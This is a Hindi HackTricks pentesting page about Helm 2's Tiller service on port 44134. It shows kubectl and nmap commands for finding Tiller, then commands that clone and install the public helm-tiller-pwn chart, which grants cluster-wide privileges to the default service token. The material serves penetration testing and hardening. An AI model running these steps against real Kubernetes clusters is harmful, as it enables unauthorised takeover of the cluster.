9 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करना है? SUBSCRIPTION PLANS की जांच करें!
-
खोजें The PEASS Family, हमारा विशेष संग्रह NFTs
-
प्राप्त करें official PEASS & HackTricks swag
-
Join the 💬 Discord group या telegram group में शामिल हों या मुझे Twitter पर फ़ॉलो करें 🐦@carlospolopm.
-
अपने हैकिंग ट्रिक्स साझा करें, hacktricks repo और hacktricks-cloud repo में PR जमा करके।
मूलभूत जानकारी
Helm Kubernetes के लिए पैकेज प्रबंधक है। इसकी मदद से YAML फ़ाइलों को पैकेज करके उन्हें सार्वजनिक और निजी रिपॉजिटरी में वितरित किया जा सकता है। इन पैकेज को Helm Charts कहा जाता है। Tiller डिफ़ॉल्ट रूप से पोर्ट 44134 में चलने वाली सेवा है जो सेवा प्रदान करती है।
डिफ़ॉल्ट पोर्ट: 44134
PORT STATE SERVICE VERSION
44134/tcp open unknown
जांच
यदि आप विभिन्न नेमस्पेस के पॉड और/या सेवाओं की जांच कर सकते हैं, तो उन्हें जांचें और उनमें से जिनमें "tiller" नाम है, उन्हें खोजें:
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
उदाहरण:
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
आप इस सेवा को ढूंढ़ने के लिए पोर्ट 44134 की जांच करने की कोशिश कर सकते हैं:
sudo nmap -sS -p 44134 <IP>
एक बार जब आप इसे खोज लेते हैं, तो आप इसके साथ संवाद कर सकते हैं और क्लाइंट हेल्म एप्लिकेशन डाउनलोड कर सकते हैं। आप homebrew
जैसे टूल का उपयोग कर सकते हैं, या आधिकारिक रिलीज पेज**** पर देख सकते हैं। अधिक विवरणों के लिए, या अन्य विकल्पों के लिए, स्थापना गाइड देखें।
फिर, आप सेवा की गणना कर सकते हैं:
helm --host tiller-deploy.kube-system:44134 version
विशेषाधिकार उन्नयन
डिफ़ॉल्ट रूप से Helm2 को नेमस्पेस kube-system में उच्च विशेषाधिकारों के साथ स्थापित किया गया था, इसलिए यदि आप सेवा को खोजते हैं और इसका उपयोग करने का अधिकार है, तो यह आपको विशेषाधिकारों को बढ़ाने की अनुमति देता है।
आपको बस इस तरह का एक पैकेज स्थापित करना होगा: https://github.com/Ruil1n/helm-tiller-pwn जो डिफ़ॉल्ट सेवा टोकन को समूह के सभी क्षेत्र में पहुंच देगा।
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
http://rui0.cn/archives/1573 में आपको हमले की व्याख्या मिलेगी, लेकिन मूल रूप से, यदि आप helm-tiller-pwn/pwnchart/templates/ के भीतर clusterrole.yaml और clusterrolebinding.yaml फ़ाइलें पढ़ते हैं, तो आप देख सकते हैं कि सभी विशेषाधिकार डिफ़ॉल्ट टोकन को दिए जा रहे हैं।
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? सदस्यता योजनाएं की जांच करें!
-
खोजें The PEASS Family, हमारा विशेष संग्रह NFTs
-
प्राप्त करें आधिकारिक PEASS और HackTricks swag
-
शामिल हों 💬 Discord समूह या टेलीग्राम समूह या मुझे Twitter 🐦@carlospolopm** का पालन करें।**
-
अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके साझा करें।